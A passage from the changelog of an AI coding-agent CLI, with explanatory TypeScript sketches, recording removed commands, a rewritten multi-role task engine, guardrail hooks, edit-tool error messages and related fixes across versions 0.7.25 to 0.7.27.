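The Qwen-compat gateway fix above merges every leading contiguous `role:'system'` entry into a single system string so the transcript starts at the first user/assistant turn. The sketch below illustrates that split. The `ChatMessage` type, the function name `splitLeadingSystem`, and the blank-line separator are assumptions for illustration, not the adapter's actual code.

```typescript
// Hypothetical, simplified message shape.
type ChatMessage = { role: "system" | "user" | "assistant"; content: string };

// Collapses the leading run of system messages into one string and returns
// the remainder of the transcript untouched.
function splitLeadingSystem(messages: ChatMessage[]): {
  system: string;
  transcript: ChatMessage[];
} {
  const firstNonSystem = messages.findIndex((m) => m.role !== "system");
  const boundary = firstNonSystem === -1 ? messages.length : firstNonSystem;
  const system = messages
    .slice(0, boundary)
    .map((m) => m.content)
    .join("\n\n"); // separator is an assumption
  return { system, transcript: messages.slice(boundary) };
}

const afterCompaction: ChatMessage[] = [
  { role: "system", content: "role instructions" },
  { role: "system", content: "compaction summary" },
  { role: "system", content: "post-compact ledger" },
  { role: "user", content: "continue the task" },
  { role: "assistant", content: "working on it" },
];
const merged = splitLeadingSystem(afterCompaction);
```

This only handles the leading run; a system message that appears later in the transcript is left in place here, which is the case the provider-level collapse in Fix 2 is described as covering.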
639
+ ### Changed
640
+
641
+ - **FEATURE_086 subtask B, item 5 — shared YAML frontmatter helpers extracted to `@kodax/skills/shared/yaml`**. `sanitizeYaml` / `normalizeHooks` / `parseYamlFrontmatter` / `normalizeAllowedToolsString` / `normalizeYamlHookEntry` / `normalizeYamlHookEntryList` / `normalizeYamlHookMap` lived as duplicate copies in `packages/skills/src/skill-loader.ts` and `packages/repl/src/commands/discovery.ts`. Unified to a single source under `packages/skills/src/shared/yaml.ts`; `package.json` adds the `"./shared/yaml"` subpath export; `vitest.config.ts` aliases the subpath (placed before `@kodax/skills` for prefix precedence). Behaviour identical.
642
+ - **FEATURE_086 subtask B, item 6 — Provider config / snapshot dedup via `buildProviderConfig` helper**. `KODAX_PROVIDER_SNAPSHOTS` is now the single source of truth for `apiKeyEnv`, `model`, and `reasoningCapability`. Each of the 9 built-in Provider classes derives those three fields via `buildProviderConfig(name, extras)` so the class config and the snapshot cannot drift out of sync. `ProviderSnapshot` type + `KODAX_PROVIDER_SNAPSHOTS` const moved above the class definitions to avoid forward-reference gymnastics. Net -6 lines; no behaviour change.
643
+ - **FEATURE_086 subtask B, item 7 — Lazy-singleton built-in providers with env-aware invalidation**. `getProvider(name)` no longer constructs a fresh SDK client (`new Anthropic({...})`, `new OpenAI({...})`) on every call. The `builtinProviderCache` keys on both provider name and current `*_API_KEY` env value so tests that mutate env between cases still see fresh clients. New `resetBuiltinProviderCache()` export for explicit test isolation.
644
+
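The lazy-singleton entry above keys the provider cache on both the provider name and the current API-key env value. A minimal sketch of that idea follows. `ProviderClient`, `getCachedProvider`, and the explicit `env` parameter are hypothetical stand-ins (the real `getProvider(name)` takes only a name and builds an SDK client); only `builtinProviderCache` and `resetBuiltinProviderCache` are names from the changelog.

```typescript
type Env = Record<string, string | undefined>;

// Hypothetical stand-in for an SDK client.
interface ProviderClient {
  readonly name: string;
  readonly apiKey: string;
}

const builtinProviderCache = new Map<string, ProviderClient>();
let constructionCount = 0; // counts how often a client is actually built

function getCachedProvider(name: string, apiKeyEnv: string, env: Env): ProviderClient {
  const apiKey = env[apiKeyEnv] ?? "";
  // Keying on name + key value means a changed env var yields a fresh client.
  const cacheKey = `${name}\u0000${apiKey}`;
  const cached = builtinProviderCache.get(cacheKey);
  if (cached) return cached;
  constructionCount += 1;
  const client: ProviderClient = { name, apiKey };
  builtinProviderCache.set(cacheKey, client);
  return client;
}

function resetBuiltinProviderCache(): void {
  builtinProviderCache.clear();
}

const firstEnv: Env = { ANTHROPIC_API_KEY: "key-a" };
const clientA1 = getCachedProvider("anthropic", "ANTHROPIC_API_KEY", firstEnv);
const clientA2 = getCachedProvider("anthropic", "ANTHROPIC_API_KEY", firstEnv);
const clientB = getCachedProvider("anthropic", "ANTHROPIC_API_KEY", { ANTHROPIC_API_KEY: "key-b" });
```

Here `clientA1` and `clientA2` are the same object, while `clientB` is built fresh because the key value differs, which mirrors the behaviour the entry describes for tests that mutate env between cases.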
645
+ ### Removed
646
+
647
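+ - **FEATURE_086 subtask B, item 3 — `/project` command removed in its entirety** (FEATURE_054's goal is met and the feature is archived; AMA Scout-first via `--agent-mode ama` has fully covered it since FEATURE_061. In earlier versions `/project` and AMA coexisted; as of this version AMA is the only project-level workflow entry point)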
648
+ - **Breaking change**: the CLI flags (`--init` / `--append` / `--overwrite` / `--auto-continue` / `--max-sessions` / `--max-hours`), the public API (`ProjectStorage` / `ProjectFeature` / `ProjectState` / `ProjectStatistics` / `FeatureList` / `calculateStatistics` / `getNextPendingIndex` / `isAllCompleted` / `handleProjectCommand` / `detectAndShowProjectHint` / `buildInitPrompt` / `getFeatureProgress` / `checkAllFeaturesComplete`), and the REPL `/project *` commands are all unavailable; downstream code that has not moved to AMA must migrate before v0.7.27
649
+ - **Migration path**:
650
+ - `kodax --init "..."` / `kodax --auto-continue` → `kodax --agent-mode ama "..."` (Scout routes to H0/H1/H2 automatically)
651
+ - `/project brainstorm` / `/project plan` / `/project next` / `/project auto` → AMA's built-in Planner automatically absorbs the brainstorm + plan + execute flow
652
+ - Manual maintenance of `feature_list.json` / `PROGRESS.md` → AMA's internal evidence bundle + managed-task archive (`.agent/managed-tasks/`)
653
+ - **What was actually removed** (Commits A→D, net −12,000+ lines):
654
+ - **Commit A (Layer 6 heuristics)**: `packages/coding/src/prompts/long-running.ts` (LONG_RUNNING_PROMPT), the `detectLongRunningProjectContext` / `getLongRunningContext` / `harness: 'project'` hint path, and the `'Project harness'` /provider scenario
655
+ - **Commit B (Layer 4+5 CLI surface)**: the 6 flag registrations and help text in `src/kodax_cli.ts`; the `init` / `append` / `overwrite` / `autoContinue` / `maxSessions` / `maxHours` fields and the `parseNonNegativeIntWithFallback` / `parsePositiveNumberWithFallback` helpers in `src/cli_option_helpers.ts`; and `buildInitPrompt` / `getFeatureProgress` / `checkAllFeaturesComplete` / `readFeatureProgressSnapshot` in `packages/repl/src/common/utils.ts`
656
+ - **Commit C (Layer 0-3 module)**: `packages/repl/src/interactive/project-{brainstorm,commands,harness,harness-core,harness-types,planner,quality,state,storage,workflow}.ts` (10 files) + the corresponding `*.test.ts` (9 files) + `commands-project-shim.test.ts` + `completers/project-completer.ts`; full cleanup of barrel re-exports (`packages/repl/src/interactive/index.ts` / `packages/repl/src/index.ts` / `src/index.ts`); the `LEGACY_PROJECT_COMMAND_NAMES` / `printProjectMigrationGuidance` stub + two call sites in `commands.ts`; the dead `PROJECT_ARGS` constant in `completers/command-arguments.ts`; `isFeatureList` / `isProjectFeature` / `isProjectWorkflowState` / `isProjectControlState` / `isBrainstormSession` + their companion constants in `json-guards.ts`; the `result.projectInitPrompt` branch in `repl.ts` + `InkREPL.tsx`; the `CommandResult` / `CommandResultData` type fields; `KodaXTaskSurface` narrowed to `'cli' | 'repl' | 'plan'`, and the `.agent/project/managed-tasks/` branch of `getManagedTaskWorkspaceRoot` merged into `.agent/managed-tasks/`
657
+ - **Commit D (tail cleanup + docs)**: the two orphan constants `KODAX_FEATURES_FILE` / `KODAX_PROGRESS_FILE`; the Project Mode sections and public API examples in README / README_CN / packages/coding/README.md; FEATURE_054 scope archived in `docs/FEATURE_LIST.md`
658
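+ - **FEATURE_054 archived**: before v0.7.27 the goal of FEATURE_054 was to "absorb /project into AMA H2". During execution it turned out that AMA had fully covered the /project feature surface since FEATURE_061, so the "absorb" task became a straight "delete", and FEATURE_054 is closed out with this release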
659
+ - **FEATURE_086 subtask B, item 2 — `--team` CLI flag removed completely** (retired by ADR-017; FEATURE_027 has replaced it with `--agent-mode ama|sa` since v0.7.10; until now it was only soft-retired through a sunset handler)
660
+ - `src/kodax_cli.ts`: removed the commander `.option('--team <tasks>', ...)` registration, the `team` help topic object, the help index line, the global help line, the help topics string, `--team` in the bash completion string, the `opts.team` pass-through, and the sunset handler block
661
+ - `src/cli_option_helpers.ts`: removed the `CliOptions.team?: string` field and the `|| cliOptions.team` condition in the json-mode guard of `validateCliModeSelection`
662
+ - `tests/kodax_cli.test.ts`: renamed `should document provider and team caveats` to `provider and project caveats`, removed the team wording assertions, and added `not.toContain('--team')` as a negative guard
663
+ - User-observable behaviour change: `kodax --team xxx` goes from the "[Deprecated] --team has been sunset" error to commander's native `error: unknown option '--team'` (both exit 1; the latter includes a "Did you mean ...?" suggestion, which is friendlier to users)
664
+ - `README.md`: removed the `--team <tasks>` row from the CLI options; the `--team "..."` example became an equivalent `--agent-mode ama "..."` example, keeping its intent of showcasing multi-agent parallelism
665
+ - `docs/test-guides/GENERAL_v0.5.20_TEST_GUIDE.md`: added an archive notice at the top stating that the `--team` / Agent Team test cases are invalid as of v0.7.27 and that the replacement entry point is `--agent-mode ama`
666
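+ - Erratum sync: corrected the text of FEATURE_086 subtask B, item 2 in `docs/features/v0.7.27.md`. The v1 design draft wrongly assumed that "the CLI flag has already been removed from `src/**/*.ts`, and this version only cleans up config.json leftovers"; in fact the CLI flag was fully present in src, and config.json never had a `team` field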
667
+ - **FEATURE_086 subtask B, item 1 — `compactMessages()` and related constants removed** (marked `@deprecated` in v0.7.23, scheduled for removal in v0.7.27)
668
+ - Deleted `packages/agent/src/messages.ts` (the function definition)
669
+ - Removed `compactMessages` from the public exports of `@kodax/agent` / `@kodax/coding`
670
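+ - Also removed the orphan constants `KODAX_COMPACT_THRESHOLD` / `KODAX_COMPACT_KEEP_RECENT` (used only by the removed function; the equivalent configuration in the new mechanism is the `thresholdRatio` / `keepRecent` fields of `DefaultSummaryCompactionOptions`)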
671
+ - Migration guide: the coding preset uses `LineageCompaction` from `@kodax/session-lineage` (which keeps FEATURE_072 post-compact reconstruction); general-purpose agents use `DefaultSummaryCompaction` from `@kodax/core`. Both share the `CompactionPolicy` interface (FEATURE_081, v0.7.23)
672
+ - Safety net: `packages/core/src/compaction.test.ts` (16 tests) + `packages/session-lineage/src/compaction.test.ts` (5 tests) cover the new path; production compaction has gone through the Runner-driven `compactionHook` since v0.7.26
673
+ - Docs sync: the code examples in `README.md` / `packages/agent/README.md` changed from `compactMessages` to `DefaultSummaryCompaction`; `docs/test-guides/FEATURE_010_v0.5.3_PHASE3_AGENT_PACKAGE_TEST_GUIDE.md` gained an archive notice at the top
674
+
675
+ ---
676
+
677
+ ## [0.7.26] - 2026-04-23
678
+
679
+ ### Added
680
+ - **FEATURE_084 — Task Engine Phase 2: Scout/Generator/Evaluator rewritten on Layer A Runner primitives**
681
+ - New `packages/coding/src/task-engine/runner-driven.ts` (2545 LoC) replaces the legacy `runManagedTask` state machine; dispatch gated via `KODAX_MANAGED_TASK_RUNTIME=runner` env flag (Shard 5a/5b), then flipped to default and legacy AMA orchestration deleted (Shard 6d-a/6d-b).
682
+ - Scout / Planner / Generator / Evaluator re-expressed as `Agent` instances with `Handoff` topology (`buildRunnerAgentChain`). H0/H1/H2 state machine now encoded as declarative continuation handoffs.
683
+ - fenced-block text protocol replaced by tool-call structured protocol (absorbs FEATURE_059 dual-track `visibleText + protocolPayload` goal): `emit_scout_verdict` / `emit_contract` / `emit_handoff` / `emit_verdict` runnable tools in `packages/coding/src/agents/protocol-emitters.ts`, Zod-validated payloads.
684
+ - Shard 6a: observer events + full `managedTask` payload parity (`ObserverBridge`).
685
+ - Shard 6b: real budget tracking (`ManagedTaskBudgetController`, per-harness caps + 90% approval dialog) + mutation tracker wiring (`wrapGenerator{Bash,Write}WithMutationGuard`).
686
+ - Shard 6c: checkpoint detection + per-role crash-safe write (FEATURE_071 parity); `--continue` path reads checkpoint and prompts user.
687
+ - Shard 6d-c: observer / stream / budget-extension parity fixes vs legacy.
688
+ - Shard 6d-d: `onIterationEnd` + `contextTokenSnapshot` parity.
689
+ - Shard 6d-e: `session.initialMessages` pass-through so REPL multi-turn / resume / plan-mode replay see full prior context.
690
+ - Shard 6d-f: role-scoped tool boundaries + evaluator shell mutation guard (`wrapReadOnlyBash`).
691
+ - Shard 6d-g..Q: Runner-driven v0.7.22 parity — `promptOverlay` stitching, Scout suspicious-completion detection, `dispatch_child_task` role wrappers with write-worktree path registration for Evaluator diff injection (FEATURE_067 v2 parity).
692
+ - Shard 6d-S: `taskVerification.runtime` surfaced into Evaluator instructions (startup command, ready signal, UI/API/DB checks) so Evaluator actively probes runtime rather than writing verdict from static reads.
693
+ - Shard 6d-T: dynamic Generator / Evaluator instructions so Scout's skillMap obligations reach the executing/verifying model.
694
+ - **FEATURE_085 — Guardrail tri-layer runtime (Input / Output / Tool)**
695
+ - `@kodax/core/src/guardrail.ts`: `InputGuardrail` / `OutputGuardrail` / `ToolGuardrail` with 4 verdict actions (allow / rewrite / block / escalate); `GuardrailBlockedError` / `GuardrailEscalateError`; `GuardrailSpan` emission.
696
+ - `Runner` wires 3 hook points — input (before first turn), output (before return), tool before+after (around every invocation); `agent.guardrails` + `opts.guardrails` merged.
697
+ - `packages/coding/src/tools/tool-result-truncation-guardrail.ts`: adapter wrapping existing `applyToolResultGuardrail` as `ToolGuardrail.afterTool` with byte-equivalent parity.
698
+ - **max_tokens escalation + continuation ladder** (implementation-time absorption, no separate feature id): `@kodax/ai` exports `KODAX_ESCALATED_MAX_OUTPUT_TOKENS`; Runner adapter auto-continues on `stop_reason === 'max_tokens'` and escalates the ceiling after N continuations; Scout parity so Scout's recon isn't silently truncated; `kimi-code` provider aligned to coding-provider capped-budget ladder.
699
+ - **`multi_edit` tool** — apply N exact-or-normalized-text replacements to a single file in one tool call. Edits apply sequentially (each edit sees the result of the previous one) and the whole batch is ATOMIC — any single failing `old_string` aborts the batch with no partial disk writes. Makes the "write skeleton + N edits" workflow cheap enough to be the default rather than a grudging fallback, removing the incentive for LLMs to fall back to "run Python to generate files". Description carries an explicit ANCHOR WARNING so models avoid anchor-consumed mistakes upfront, and a dedicated diagnostic fires when `edits[k]`'s anchor was swallowed by an earlier edit in the batch.
700
+ - **C1 fenced-block fallback parser restored on Runner-driven path** — v0.7.22's `parseManagedTaskScoutDirective` / handoff / verdict / contract fallback had been lost in the rewrite; now `attemptProtocolTextFallback` re-wires it so an LLM that forgot to call the `emit_*` tool but emitted a well-formed `kodax-task-*` fenced block still advances the state machine instead of stalling until the iteration cap.
701
+ - **H1 structural resume + post-compact reinjection (M3)** — checkpoint reload seeds the Runner-driven recorder with Scout / Contract payloads reconstructed from the saved managed-task runtime (`buildStructuralResumeSeed`), so `--continue` doesn't restart from scratch when the prior session had already committed a harness tier. Post-compaction reinjection (M3) threads recorded scout-decision / contract payloads back into the running transcript so multi-role chains survive compaction.
702
+
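The `multi_edit` entry above describes sequential, all-or-nothing batches. A minimal sketch of that contract follows, assuming exact-match anchors only (the normalized-text matching mentioned above is not modelled). `applyMultiEdit` and the error wording are hypothetical, not the tool's actual implementation.

```typescript
interface Edit {
  old_string: string;
  new_string: string;
}

// Applies edits in order against an in-memory copy. Any failure throws before
// the caller has a result to write, so the batch is all-or-nothing.
function applyMultiEdit(original: string, edits: readonly Edit[]): string {
  let text = original;
  edits.forEach((edit, k) => {
    if (edit.old_string === "") {
      throw new Error(`edits[${k}]: old_string must not be empty`);
    }
    const first = text.indexOf(edit.old_string);
    if (first === -1) {
      // If the anchor existed in the original file, an earlier edit removed it.
      const consumed = original.includes(edit.old_string);
      throw new Error(
        consumed
          ? `edits[${k}]: anchor was consumed by an earlier edit in this batch`
          : `edits[${k}]: old_string not found`,
      );
    }
    if (text.indexOf(edit.old_string, first + 1) !== -1) {
      throw new Error(`edits[${k}]: old_string is ambiguous`);
    }
    // Each edit sees the result of the previous one.
    text = text.slice(0, first) + edit.new_string + text.slice(first + edit.old_string.length);
  });
  return text;
}
```

The caller would write the returned string to disk only after the function returns, which is what keeps a failing batch from leaving partial writes.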
703
+ ### Fixed
704
+ - **Issue 119** — Scout H0→H1 upgrade no longer leaves stale pre-Scout `mutationSurface` locking Generator to docs-only writes. Post-Scout roles read Scout's own scope / reviewFilesOrAreas instead of the pre-Scout regex heuristic.
705
+ - **Issue 120** — Skill / plan-mode execution paths now route queued user inputs into the streaming prompt queue (`canQueueFollowUps` + `drainPendingInputsAsFollowUps`); previously follow-up inputs were silently dropped during skill / plan-mode execution.
706
+ - Managed-task error recovery: iteration cap raised to 500 for full multi-role chains (Core's default 20 was too low for Scout → Planner → Generator → Evaluator), budget extension dialog at 90% threshold as real throttle; `error.position` propagated through the Runner → task-engine surface.
707
+ - Classify undici `"terminated"` + cause-chain errors as retryable in `resilience/classifier.ts`; non-streaming fallback also handles `terminated`, hard-limit guard added for large `write` turns, and provider retry budget bumped for long Generator runs.
708
+ - Scout false-completion observability layer + Windows bash `cmd` trap hint.
709
+ - Write / edit prompts aligned with Claude Code multi-layer defense.
710
+ - **Scout v0.7.22 tool-set regression** — Runner-driven Scout had been stripped to a read-only subset during the rewrite; restored the full legacy tool surface (write / edit / multi_edit / exit_plan_mode + unwrapped bash so Scout can run grep/find without the docs-only wrapper firing). Scout instructions now also ship the Working-Directory / git-root / platform context so it stops `cd`-ing to invented paths.
711
+ - **H1 Scout→Generator→Evaluator infinite loop** — Scout's `confirmedHarness` is now checked in `inferScoutMutationIntent` so a mutation-intent Scout verdict correctly advances to Generator instead of bouncing between Evaluator-review and Generator-rewrite.
712
+ - **H1 same-harness unbounded revise** — `reviseCountByHarnessRef` + `H1_MAX_SAME_HARNESS_REVISES = 1` caps revises per harness tier and auto-escalates / converts when the cap is hit, preventing the "Evaluator keeps sending back, Generator keeps retrying same harness" spiral.
713
+ - **Evaluator explicit `budgetRequest` discarded** — the Runner-driven `emit_verdict` input schema now surfaces `budgetRequest` through to `maybeRequestAdditionalWorkBudget({ force: true })`, so an Evaluator's justified extension request bypasses the 90%-threshold heuristic.
714
+ - **`dispatch_child_task` child-executor lazy-load diagnostics** — lazy-loader now returns a descriptive envelope + performs export checks so cryptic "X is not a function" stalls surface the real reason (module not built / export missing) to the Evaluator instead of tripping the outer iteration cap.
715
+ - **`WRITE_ONLY_TOOLS` parity** — restored 9 Godot-specific tool names (`open_project`, `new_scene`, `set_property`, ...) that had been dropped during the Runner-driven migration, so the Evaluator read-only boundary matches v0.7.22.
716
+ - **Managed protocol multi-emit deduplication** — regression test added for the "Scout emits `emit_scout_verdict` twice in one turn" case; the recorder dedupes on `role` so the second emit is a no-op instead of triggering a handoff loop.
717
+ - **P2b write-turn `max_output_tokens` cap on RST-prone providers** — Zhipu/Kimi/MiniMax coding providers now have an 8K cap applied when the turn's tool inventory includes `write` / `edit` / `multi_edit`; prevents RST resets mid-stream. Overridable via `KODAX_RST_PRONE_PROVIDERS` and `KODAX_WRITE_TURN_MAX_TOKENS` env vars. Explicit `KODAX_MAX_OUTPUT_TOKENS` always wins.
718
+ - **`edit` / `multi_edit` error enrichment for anchor recovery** — ambiguous-match errors now include the line numbers of each duplicate (`"matched 2 places (lines 2 and 6)"` up to 3 listed, then `"and N more"`) so the LLM can see where the collisions are and widen the right one. Recovery guidance shifted from "retry with a unique anchor" to an explicit "widen old_string with nearby unique context, or set replace_all=true" + the anti-pattern warning `"(Shorter anchors match more, not fewer.)"`. Not-found errors now call out the most common cause — copying an anchor from a narrow `read` window with whitespace drift / typos — and suggest re-reading a wider window. `multi_edit`'s anchor-consumed-by-prior-edit diagnostic is retained and trimmed. `multi_edit` tool description gains a UNIQUENESS RULE paragraph ("anchor must be unique in the WHOLE current file, not just in the window you last read"). Applied symmetrically to both `edit` and `multi_edit` so the LLM gets consistent guidance from either tool.
719
+ - **REPL info items rendered in the wrong layer during managed foreground** — `onCompact`, `onProviderRateLimit`, `onScoutSuspiciousCompletion`, and queue-limit info items now route through `emitInfoItemToCorrectLayer` so they appear inline with the active managed worker's output instead of squeezed under the user prompt. Mirrors the earlier retry / provider-recovery / confirm-result fixes.
720
+ - **Pre-release review findings (HIGH-1 + MED-1..7)**:
721
+ - HIGH-1 — session transcript now records the post-input-guardrail user message (symmetric with the already-post-guardrail output side), so `--resume` / audit consumers see what the LLM actually processed on both ends.
722
+ - MED-1 — tool-before / tool-after guardrails now receive `{ ...guardrailCtx, agent: currentAgent }`; input / output guardrails keep run-scoped `startAgent` as designed.
723
+ - MED-2 — regression guards for `toolObserver.beforeTool` returning `false` / string (blocked result with default / custom message).
724
+ - MED-3 — guardrail `check` / `beforeTool` / `afterTool` exceptions now emit a `GuardrailSpan` with `decision: 'error'` + message, then re-throw (fail-loud preserved).
725
+ - MED-4 — `compactionHook` error caught and surfaced as `compaction:hook-error` child span; the run still continues (the safety contract — compaction failure must never abort — is preserved).
726
+ - MED-5 — regression guard for the L5 `max_tokens` continuation break at `KODAX_MAX_MAXTOKENS_RETRIES`.
727
+ - MED-6 — `emitInfoItemToCorrectLayer` JSDoc + mirror comment at `addHistoryItem` import lock in the "info items during managed foreground MUST route through the layer-aware emitter" rule.
728
+ - MED-7 — 4 regression guards pin the `maybeApplyP2bWriteTurnCap` multi-turn / idempotence / L4-escalation-leak contract.
729
+
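The `edit` / `multi_edit` error-enrichment entry above reports the line numbers of duplicate anchors. The sketch below shows one way to compute them. `matchLines` and `describeAmbiguity` are hypothetical helpers, and the exact wording for more than two matches is an assumption, since the changelog only quotes the two-match form.

```typescript
// 1-based line numbers at which `anchor` starts within `text`.
function matchLines(text: string, anchor: string): number[] {
  const lines: number[] = [];
  if (anchor === "") return lines;
  let from = 0;
  for (;;) {
    const at = text.indexOf(anchor, from);
    if (at === -1) return lines;
    lines.push(text.slice(0, at).split("\n").length);
    from = at + anchor.length;
  }
}

// Returns an enriched error message when the anchor matches more than once,
// or null when the anchor is unique or absent.
function describeAmbiguity(text: string, anchor: string, maxListed = 3): string | null {
  const lines = matchLines(text, anchor);
  if (lines.length < 2) return null;
  const shown = lines.slice(0, maxListed);
  const extra = lines.length - shown.length;
  const list =
    extra > 0
      ? `${shown.join(", ")} and ${extra} more`
      : `${shown.slice(0, -1).join(", ")} and ${shown[shown.length - 1]}`;
  return (
    `matched ${lines.length} places (lines ${list}). ` +
    "Widen old_string with nearby unique context, or set replace_all=true. " +
    "(Shorter anchors match more, not fewer.)"
  );
}
```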
730
+ ### Changed
731
+ - Legacy `runManagedTask` orchestration (~7343 LoC in `task-engine.ts`) removed; `task-engine.ts` reduced to a thin facade re-exporting the Runner-driven path.
732
+ - AMA prompt builder restored into the Runner-driven path: `_internal/managed-task/role-prompt.ts` ports v0.7.22 `createRolePrompt` 1:1, closing the earlier prompt-surface gap. Full decision / contract / metadata / verification / tool-policy / evidence-strategy / dispatch / H0/H1/H2 quality framework / handoff-verdict-contract specs reach every role turn via `RolePromptContextFactory`.
733
+ - v0.7.26 parity restoration (5-commit sweep before release): sanitize pipeline re-added with 22 unit tests; `onToolCall` / `onToolResult` / `onToolProgress` events fire from core `Runner`; Anthropic extended thinking contract honoured (thinking blocks preserved in assistant history); 6 more gaps closed (iteration cap, cost tracker, budget extension, guardrail wrapper, dead code, stale comments); tool-result-truncation guardrail wired; multimodal input artifacts reach Scout turn (C1); dispatch-child-task parallel fan-out + progress events restored (C2); session snapshot persisted at success + error terminals (C3); **skill artifacts written + role prompts quote stable filesystem paths (C4)**; verification-only roles (Scout / Evaluator) shell boundary now a superset of legacy `SHELL_WRITE_PATTERNS` (PowerShell verbs, del / touch / mkdir / rmdir, sed -i / perl -pi / python -c / node -e, plus v0.7.26 safety extensions for chmod / chown / git / package-manager installs). JSON output mode surfaces `onToolProgress` / `onManagedTaskStatus` / `onScoutSuspiciousCompletion`.
734
+ - **Kimi K2.6 promoted to default** on `kimi-code` and `kimi` providers (replaces the earlier K2 default); aligns the coding capped-budget ladder with the richer model's token ceilings.
735
+ - **REPL info rendering** now uniformly routes through `emitInfoItemToCorrectLayer` whenever a managed worker owns the foreground turn (compact notices, provider rate-limit banners, Scout suspicious-completion hints, queue-limit notices). Eliminates the "info item squeezed under user prompt instead of inline with active worker output" bug.
736
+
737
+ ### Removed
738
+ - `packages/coding/src/task-engine/_internal/prompts/{role-prompt,role-prompt-types,role-agent,runtime-execution-guide,tool-policy}.ts` — inlined or migrated to `_internal/managed-task/{tool-policy,scout-signals,repo-intelligence,artifacts}.ts` + `runner-driven.ts`.
739
+ - `packages/coding/src/task-engine/_internal/protocol/{parse-helpers,sanitize}.ts` — obsoleted by Zod-validated emit tools; fenced-block parsing + control-plane marker stripping no longer needed.
740
+ - `packages/coding/src/task-engine/_internal/formatting.ts` — pure string builders inlined into instruction / block renderers.
741
+ - `packages/coding/src/managed-protocol-handoff.test.ts` (786 LoC) — coverage replaced by `runner-driven.test.ts` (2285 LoC) + `agents/protocol-emitters.test.ts` (278 LoC).
742
+
743
+ ### Documentation
744
+ - `config.example.jsonc` template rebuilt — restored missing fields (`customProviders`, `providerModels`, `providerReasoningOverrides`, `mcpServers`, `extensions`, `agentMode`, `locale`, `thinking`, `streamIdleTimeoutMs`, `alwaysAllowTools`, full `compaction` block); removed stale `parallel` block and the misleading `permissionMode: "auto"` hint.
745
+ - **FEATURE_094 (P2d anti-escape guardrail) staged** for v0.7.36 — design captured in `docs/features/v0.7.36.md`; implementation deferred past v0.7.26.
746
+
747
+ ### Test Status
748
+ - `packages/coding`: 763+/764+ pass (1 Windows-only bash-background test flakes on tmp-dir EBUSY under parallel execution; passes in isolation). Includes 4 new regression guards for `edit` / `multi_edit` ambiguous-match line-number reporting + narrow-read not-found hints.
749
+ - `packages/core`: 86/86 pass (Runner / tool loop / handoff / Guardrail including MED-3 error-span regression + MED-1 handoff agent-ctx + HIGH-1 session symmetry, Agent / Session / Compaction)
750
+ - `packages/tracing`: 15/15 pass
751
+ - `packages/repl`: 830+ pass (no regressions)
752
+ - Full monorepo build green (`tsc -b` passes)
753
+
754
+ ---
755
+
756
+ ## [0.7.25] - 2026-04-21
757
+
758
+ ### Added
759
+ - **FEATURE_076 — Managed Task Round Boundary (User Conversation Preservation)**: `runManagedTask` now normalizes its exit across all 6 paths (SA / H0 / H1 / H2 / resume / fork) via a single `reshapeToUserConversation` seam, so `context.messages` always comes back as a clean `{user, assistant}` dialog instead of worker execution trace (Scout role-prompt-wrapped user, Evaluator isolated session, etc.). Fixes multi-turn conversation incoherence, token-meter snap-downs after H1/H2 completion, Scout role-prompt boilerplate leaking into next round, and session-persistence pollution.
760
+ - Q1 **unconverged detection**: reuses the existing `KodaXTaskStatus` enum (`isUnconvergedVerdict`). `running` / `planned` fall back to the raw trace; `completed` / `blocked` / `failed` reshape (blocked reason / error message IS a valid user-facing answer). Zero new field on `KodaXResult`; no string matching on placeholder summaries.
761
+ - Q2 **token snapshot**: full `recomputeContextTokenSnapshot` (drops stale usage; preserves only the source tag) replaces the partial-rebase approach, eliminating the drift class behind token-meter bugs.
762
+ - Q3 **fork mode integration**: InkREPL fork path now pushes the user fork prompt into `context.messages` before the assistant turn, matching the other 5 paths.
763
+ - Q4 **load-time normalization**: `normalizeLoadedSessionMessages` drops trailing role-prompt-shaped worker pairs when loading pre-v0.7.25 sessions, so `/load-session` + follow-up no longer inherits Evaluator/Scout role-prompt pollution. Regex anchored at message start to avoid false positives on casual "You are..." text.
764
+ - CLI REPL consumer update: both artifact-ledger call sites prefer `result.artifactLedger` with a messages-walk fallback; `KodaXResult` gains an optional `artifactLedger` field populated by the reshape.
765
+ - **FEATURE_058 — Transcript Native Scrollback Dump** (moved up from v0.8.0): transcript-mode `s` keybinding exits the alternate-screen, writes a plain-text serialization of the current transcript view into the terminal's native scrollback, then re-enters the fullscreen surface (renderer repaints from React state on re-entry; no content restoration needed). Serializer strips ANSI escape sequences (CSI / OSC / 2-byte ESC), skips internal `thinking` items, summarizes tool groups one line per call. Footer hint shows `s dump` in the default transcript variant only. Reuses FEATURE_051 substrate — no new primitives.
766
+ - **FEATURE_075 — Plan Approval Dialog Scroll**: two-layer defense against oversized plans.
767
+ - LLM-first constraint: `exit_plan_mode` tool schema now requires "at most 40 lines total, 3 bullet-depth levels, one sentence per bullet; otherwise split into phases".
768
+ - Mechanical fallback: `DialogSurface.PlanScrollPanel` renders the full plan in a 15-line viewport with local scroll state + `useInput` for arrow keys / PgUp / PgDn. Approval buttons stay pinned. Scope-trimmed per review: dropped the originally planned `$EDITOR` integration and markdown rendering (no evidence of demand / YAGNI).
769
+ - Confirmed `FEATURE_051 — Host-Aware Fullscreen TUI Substrate and Transcript UX` release: code-complete since the v0.7.25 planning cycle; ships as part of this release.
770
+
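The FEATURE_058 entry above describes a plain-text serializer that strips CSI / OSC / 2-byte ESC sequences, skips `thinking` items, and prints one line per tool call. A rough sketch under assumptions: `TranscriptItem` and its fields are hypothetical, and the regular expression covers only the common forms of each escape family, not every sequence a terminal accepts.

```typescript
// Hypothetical transcript item shapes for illustration.
type TranscriptItem =
  | { kind: "text"; text: string }
  | { kind: "thinking"; text: string }
  | { kind: "tools"; calls: { name: string; summary: string }[] };

// CSI (ESC [ ... final byte), OSC (ESC ] ... BEL or ESC \), then 2-byte ESC sequences.
const ANSI = /\x1b\[[0-?]*[ -\/]*[@-~]|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)|\x1b[@-Z\\-_]/g;

const stripAnsi = (s: string): string => s.replace(ANSI, "");

function serializeTranscript(items: readonly TranscriptItem[]): string {
  const out: string[] = [];
  for (const item of items) {
    if (item.kind === "thinking") continue; // internal items are not dumped
    if (item.kind === "tools") {
      // One summary line per tool call.
      for (const call of item.calls) out.push(stripAnsi(`[tool] ${call.name}: ${call.summary}`));
    } else {
      out.push(stripAnsi(item.text));
    }
  }
  return out.join("\n");
}
```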
771
+ ### Changed
772
+ - `buildToolConfirmationDisplay("exit_plan_mode", …)` no longer head+tail truncates the plan. Readline consumers get the full plan as `details` (native terminal scroll handles it); InkREPL reads `input.plan` as `planContent` and renders via `PlanScrollPanel`, stripping the plan lines out of the single-line confirm prompt to avoid double-rendering.
773
